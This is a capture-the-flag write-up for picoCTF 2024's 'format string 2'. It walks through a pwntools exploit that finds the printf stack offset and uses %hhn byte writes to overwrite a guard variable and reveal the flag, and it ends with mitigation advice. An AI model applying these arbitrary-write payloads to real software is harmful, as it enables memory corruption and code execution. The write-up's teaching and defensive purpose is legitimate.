format string 2 picoCTF 2024 Solution

Published: April 3, 2024

Description

This program is not impressed by cheap parlor tricks like reading arbitrary data off the stack. To impress this program you must change data on the stack!

Pwntools exploit

Download vuln and vuln.c for local analysis and install pwntools.

Interact with the remote instance at rhea.picoctf.net 64167.

bash
wget https://artifacts.picoctf.net/c_rhea/15/vuln && \
wget https://artifacts.picoctf.net/c_rhea/15/vuln.c && \
pip install pwntools && \
nc rhea.picoctf.net 64167
This is the culmination of the format string series. After learning format specifiers in format string 0 and stack leaking in format string 1, you now use pwntools to overwrite memory and control program flow. The Buffer Overflow and Binary Exploitation guide covers the fmtstr_payload technique used here alongside stack overflows and heap exploitation.
  1. Step 1: Find the offset
    Use pwntools' FmtStr + exec_fmt helper to spray %p until the library auto-detects the correct stack offset.
    python
    autofmt = FmtStr(exec_fmt); offset = autofmt.offset

    pwntools is a Python CTF framework and exploit development library. Its FmtStr class automates format string exploitation, starting with finding the stack offset at which the format string itself appears. This matters because the %n write technique requires knowing the exact position of a controlled address on the stack.

    The exec_fmt callback connects FmtStr to the remote service: it sends a format string payload, receives the output, and returns it so FmtStr can parse the leaked values. The library sends a series of test payloads with a unique marker, then searches the leaked stack values for that marker to determine the offset automatically.

    Knowing the offset enables direct parameter access: the format specifier %15$p reads the 15th argument directly. This is essential for the write technique, where you embed a target address at a known offset in the format string and then write to it using %N$n (which writes the number of characters printed so far to the address at argument N).
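
A minimal sketch of the marker search described above, run against a toy stand-in for the vulnerable service rather than the real binary. The names fake_printf and find_offset and the buffer offset of 14 are hypothetical, chosen only for illustration; FmtStr's real probing logic is more involved.

```python
import re
import struct

MARKER = b"AAAAAAAA"  # 8 bytes = one 64-bit stack word, 0x4141414141414141


def fake_printf(payload: bytes, buffer_offset: int = 14) -> bytes:
    """Toy model of printf(buf): positional argument N >= buffer_offset is
    read from the payload itself; lower arguments return a junk value.
    buffer_offset is a made-up number, not measured from the challenge."""
    padded = payload + b"\x00" * (-len(payload) % 8)
    words = struct.unpack(f"<{len(padded) // 8}Q", padded)

    def arg(n: int) -> int:
        idx = n - buffer_offset
        return words[idx] if 0 <= idx < len(words) else 0xDEADBEEF

    # Expand every %N$p into the hex value of argument N.
    return re.sub(rb"%(\d+)\$p",
                  lambda m: b"0x%x" % arg(int(m.group(1))),
                  payload)


def find_offset(exec_fmt, max_offset: int = 64) -> int:
    """Probe %1$p, %2$p, ... until the leaked word equals the marker."""
    want = b"0x" + MARKER[::-1].hex().encode()
    for n in range(1, max_offset + 1):
        probe = MARKER + b"%" + str(n).encode() + b"$p"
        if want in exec_fmt(probe):
            return n
    raise ValueError("marker not found within max_offset arguments")


print(find_offset(fake_printf))
```

Against the real service, exec_fmt would send the probe over the socket and return the response, which is the role the callback plays for FmtStr.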

    The offset varies by binary because it depends on how much stack space the calling function uses before calling printf. Different compilers, optimization levels, and function prologues all affect the offset. This is why dynamic detection (rather than hardcoding) is the robust approach.

  2. Step 2: Craft the overwrite
    Generate a payload that writes 0x67616c66 ("flag") into address 0x404060 (the sus global). fmtstr_payload handles the padding for you.
    python
    payload = fmtstr_payload(offset, {0x404060: 0x67616c66})

    The %n format specifier is uniquely dangerous: instead of printing something, it writes the number of characters printed so far into the integer pointed to by the corresponding stack argument. By controlling how many characters are printed (via width specifiers like %100d) and controlling what address is on the stack at the right offset, an attacker can write arbitrary values to arbitrary memory.

    fmtstr_payload() constructs the entire format string automatically: it places the target address(es) in the payload at a known stack offset and uses %hhn (1 byte), %hn (2 bytes), or %n (4 bytes) with carefully calculated width values to write the desired integer.
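
To make the difference between the three write specifiers concrete, here is a toy interpreter that models only the character counter and the store. It is a sketch, not a printf implementation: toy_printf is a hypothetical name, it understands only %<width>c and %<k>$n / %<k>$hn / %<k>$hhn, it ignores literal text, and it assumes a 4-byte int as on x86-64 Linux.

```python
import re

# Bytes stored by each write specifier (assumption: 4-byte int).
WRITE_SIZES = {"hhn": 1, "hn": 2, "n": 4}


def toy_printf(fmt: str, args: list[int], memory: dict[int, int]) -> int:
    """Run the padding and write directives in fmt.

    args[k - 1] is the address supplied as positional argument k, and
    memory maps address -> byte value. Returns the characters "printed".
    """
    printed = 0
    for width, pos, spec in re.findall(r"%(?:(\d+)c|(\d+)\$(hhn|hn|n))", fmt):
        if width:
            printed += int(width)          # %<width>c emits width characters
        else:
            addr = args[int(pos) - 1]
            size = WRITE_SIZES[spec]
            # Only the low `size` bytes of the running count are stored.
            stored = (printed % 256**size).to_bytes(size, "little")
            for i, byte in enumerate(stored):
                memory[addr + i] = byte
    return printed


full, single = {}, {}
toy_printf("%364c%1$n", [0x1000], full)      # stores 0x0000016c in 4 bytes
toy_printf("%364c%1$hhn", [0x1000], single)  # stores only 0x6c
print(full, single)
```

The same count of 364 clobbers four bytes with %n but touches exactly one byte with %hhn, which is what makes byte-at-a-time writes composable.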

    Why byte-chunking matters on a network: %n stores the number of characters printed so far, so a single 4-byte %n write of 0x67616c66 would require printing 1,734,437,990 characters across the socket first, which is a non-starter. Splitting the write into four %hhn byte writes keeps the total padding under 1,000 characters (each byte's count wraps modulo 256), shrinking more than a gigabyte of output to well under a kilobyte. See the format string guide for the full %hhn byte-write derivation.

    Goal: write 0x67616c66 ("flag") to 0x404060.
    
    Naive 4-byte %n approach is too slow on the network because
    %n writes ALL FOUR BYTES at once - meaning we'd need to print
    0x67616c66 = 1,734,437,990 characters before the %n. Bad.
    
    fmtstr_payload's chunked-byte strategy:
    
      byte position    target byte    cumulative chars to print
      ---------------------------------------------------------
      0x404060 (lo)    0x66            0x66           = 102
      0x404061         0x6c            0x16c          = 364
      0x404062         0x61            0x261          = 609
      0x404063 (hi)    0x67            0x367          = 871
    
    We write each byte with %hhn after padding the running count
    up to the next target byte. The "rolling count" wraps at 256
    (byte width) so we just have to add enough %Nc each step.
    
    Resulting payload (simplified):
      [%102c%17$hhn]  + [%262c%18$hhn] + [%245c%19$hhn] + [%262c%20$hhn]
      + p64(0x404060) + p64(0x404061) + p64(0x404062) + p64(0x404063)
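
The arithmetic in the table can be reproduced in a few lines. This is a sketch under stated assumptions, not what fmtstr_payload emits: hhn_widths and build_payload are hypothetical helpers, the buffer offset of 14 is a placeholder that would have to be measured, and the directives are padded to a fixed 64 bytes so the address arguments have a predictable index. Unlike the table, which pads past a full 256 wrap at every step, the sketch uses the smallest padding that lands on each byte; both choices write the same values.

```python
import struct


def hhn_widths(value: int, nbytes: int = 4) -> list[int]:
    """Smallest %<width>c padding before each %hhn, lowest byte first."""
    widths, printed = [], 0
    for byte in value.to_bytes(nbytes, "little"):
        pad = (byte - printed) % 256   # only the count modulo 256 is stored
        widths.append(pad)
        printed += pad
    return widths


def build_payload(offset: int, addr: int, value: int, fmt_words: int = 8) -> bytes:
    """Directives first, padded to fmt_words * 8 bytes, then four addresses.

    offset is the positional index where the buffer starts (hypothetical
    here; it must be found against the real binary).
    """
    first_addr_arg = offset + fmt_words   # addresses follow the directives
    fmt = ""
    for i, pad in enumerate(hhn_widths(value)):
        if pad:                           # a zero pad needs no %c at all
            fmt += f"%{pad}c"
        fmt += f"%{first_addr_arg + i}$hhn"
    if len(fmt) > fmt_words * 8:
        raise ValueError("directives do not fit; raise fmt_words")
    body = fmt.encode().ljust(fmt_words * 8, b"A")
    # Addresses go last: their zero bytes would end the format string early.
    return body + b"".join(struct.pack("<Q", addr + i) for i in range(4))


print(hhn_widths(0x67616C66))
print(build_payload(14, 0x404060, 0x67616C66))
```

The running totals are 102, 108, 353, and 359, which reduce modulo 256 to 0x66, 0x6c, 0x61, and 0x67. Handling the circular dependency between directive length and argument index properly, rather than by fixed padding, is part of what fmtstr_payload takes care of.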

    Writing 0x67616c66 to address 0x404060 is a concrete example of arbitrary write - the most powerful primitive in binary exploitation. With arbitrary write, an attacker can overwrite: function pointers (to redirect code execution), return addresses (classic stack smashing), the Global Offset Table (to redirect library calls), or security-sensitive variables like the sus guard variable in this challenge.

    The value 0x67616c66 is the ASCII string "flag" read as a little-endian 32-bit integer: in memory the bytes are f=0x66, l=0x6c, a=0x61, g=0x67, lowest address first. Choosing a memorable ASCII value as the target makes it easy to verify the write succeeded by examining the variable in a debugger.
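
The byte order is quick to confirm with the standard library; the variable names here are illustrative only.

```python
import struct

TARGET = 0x67616C66

# Packing the integer little-endian gives the bytes as they sit in memory.
in_memory = struct.pack("<I", TARGET)
print(in_memory)                               # b'flag'

# Going the other way: read the four ASCII bytes as a little-endian integer.
print(hex(int.from_bytes(b"flag", "little")))  # 0x67616c66
```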

  3. Step 3: Send and read
    Send the payload to the remote service. Once sus holds 0x67616c66 ("flag"), the program prints picoCTF{f0rm47_57r?_f0rm47_m3m_99...}.

    Sending the pwntools-crafted payload to the remote service completes the exploit chain. The binary reads the format string and passes it to printf, which processes the %n-family specifiers and writes the bytes of "flag" into sus. The program then checks whether sus equals 0x67616c66 and, finding that it does, prints the flag.
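
Putting the three steps together, an end-to-end script might look like the sketch below. The host, port, address, and value come from this writeup; the function name exploit, the five-second timeouts, and the one-connection-per-probe behavior are assumptions about how the service behaves rather than facts confirmed here.

```python
HOST, PORT = "rhea.picoctf.net", 64167  # remote instance named in this writeup
SUS_ADDR = 0x404060                     # address of the sus global, per this writeup
TARGET = 0x67616C66                     # "flag" as a little-endian 32-bit value


def exploit(host: str = HOST, port: int = PORT) -> bytes:
    """Find the offset, overwrite sus, and return what the service prints."""
    # Imported here so the constants above load even without pwntools installed.
    from pwn import FmtStr, context, fmtstr_payload, remote

    context.arch = "amd64"       # 64-bit target, so addresses pack as 8 bytes
    context.log_level = "error"

    def exec_fmt(payload: bytes) -> bytes:
        # Assumption: the service handles one input per connection, so each
        # probe opens a fresh connection.
        with remote(host, port) as io:
            io.sendline(payload)
            return io.recvall(timeout=5)

    offset = FmtStr(exec_fmt).offset
    payload = fmtstr_payload(offset, {SUS_ADDR: TARGET}, write_size="byte")

    with remote(host, port) as io:
        io.sendline(payload)
        return io.recvall(timeout=5)
```

Calling print(exploit().decode(errors="replace")) should show the padding output followed by the flag line, provided the instance is still running on that port.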

    This demonstrates the full power of format string exploitation: starting from a single vulnerable printf(input) call, an attacker can read arbitrary memory (information disclosure) and write arbitrary memory, which can often be escalated to arbitrary code execution. The printf "write-what-where" primitive was one of the most exploited vulnerability classes in the 2000s.

    Modern mitigations that make format string exploits harder include: FORTIFY_SOURCE (catches some misuses at compile time and, on glibc at level 2, aborts at run time when a format string in writable memory contains %n), RELRO (full RELRO makes the GOT read-only, preventing GOT overwrites), and PIE (together with ASLR, randomizes the binary's base address, making hardcoded addresses invalid). However, a format string bug that leaks stack data can defeat ASLR by revealing a randomized address; a second write payload can then use the leak to target specific locations.

    pwntools makes exploit development faster and more reliable by handling the low-level details. Professional exploit developers use pwntools for CTF challenges and security research, but the underlying concepts - format string semantics, stack layout, address arithmetic - must be understood deeply to debug failures and adapt techniques to novel situations.

Flag

picoCTF{f0rm47_57r?_f0rm47_m3m_99...}

Once sus reads "flag", the binary happily prints the real flag.

How to prevent this

%n turns a format string bug from a leak primitive into a write-what-where primitive. The fix is the same as for the read-only leak; the consequences of skipping it are worse.

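  • Reject %n in attacker-controlled format strings by building with -D_FORTIFY_SOURCE=2 (on glibc this aborts when a format string in writable memory contains %n, and it only takes effect with optimization enabled), or by using a libc that does not support %n. Most production code never legitimately uses %n, so losing it costs nothing.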
  • Enable full RELRO (-Wl,-z,relro,-z,now) so the GOT is read-only after startup. Even with arbitrary write, GOT-overwrite hijacks fail.
  • And the prerequisite: don't pass user input as the format string. Catch with -Werror=format-security; ban dynamic format strings in code review.
